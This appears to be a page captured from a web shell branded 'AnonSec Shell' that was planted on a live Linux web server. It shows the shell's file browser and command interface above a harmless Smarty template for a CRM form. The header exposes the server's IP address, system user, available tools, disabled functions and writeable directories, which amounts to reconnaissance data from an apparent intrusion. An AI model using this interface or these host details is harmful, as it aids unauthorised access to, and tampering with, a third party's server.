AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.192
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_apps/leo/application/plugins/module_imobles/views/leads_history/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_apps/leo/application/plugins/module_imobles/views/leads_history/form_item.tpl
{if $id>=1}
    {$title_action = $_L['module imobles item edit']}
{else}
    {$title_action = $_L['module imobles item add']}
{/if}

<div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
    <h3>{$title_action}</h3>
</div>

<div class="modal-body">
    <div class="alert alert-danger" id="emsg-item">
        <span id="emsgbody-item"></span>
    </div>


    <form class="form-horizontal " id="form-post-item" method="post" onsubmit="return false;">    
        <input name="id" type="hidden" value="{$id}">
        <input name="crm_accounts_id" type="hidden" value="{$crm_accounts_id}">
        <input name="module_imobles_crm_goals_category_id" type="hidden" value="{$module_imobles_crm_goals_category_id}">
        <div class="row">       
            <div class="col-xs-12 col-md-12 " style="margin-top: -30px;">          
                <label class="control-label" for="">
                    {$_L['Item']} 
                </label> 

                {if $position==1}
                    <textarea class="form-control" maxlength="270"  name="title"
                              rows="3">{$item->title}</textarea>
                {else}
                    <input type="text" name="title" value="{$item->title}" class="form-control" maxlength="90">

                {/if}
            </div>    
            <input type='hidden' name='position' value='{$position}'>
        </div>
    </form>

</div>

<div class="modal-footer">
    <button class="btn btn-primary submit_item_form" data-id='{$id}' data-module_imobles_crm_goals_category_id='{$module_imobles_crm_goals_category_id}' type="submit">
        <i class="fa fa-check"></i> {$_L['Save']}
    </button>
    <a href="#"  class="cancel_item_form" data-dismiss="modal"> | {$_L['Or Cancel']}</a>
</div>


Anon7 - 2022
AnonSec Team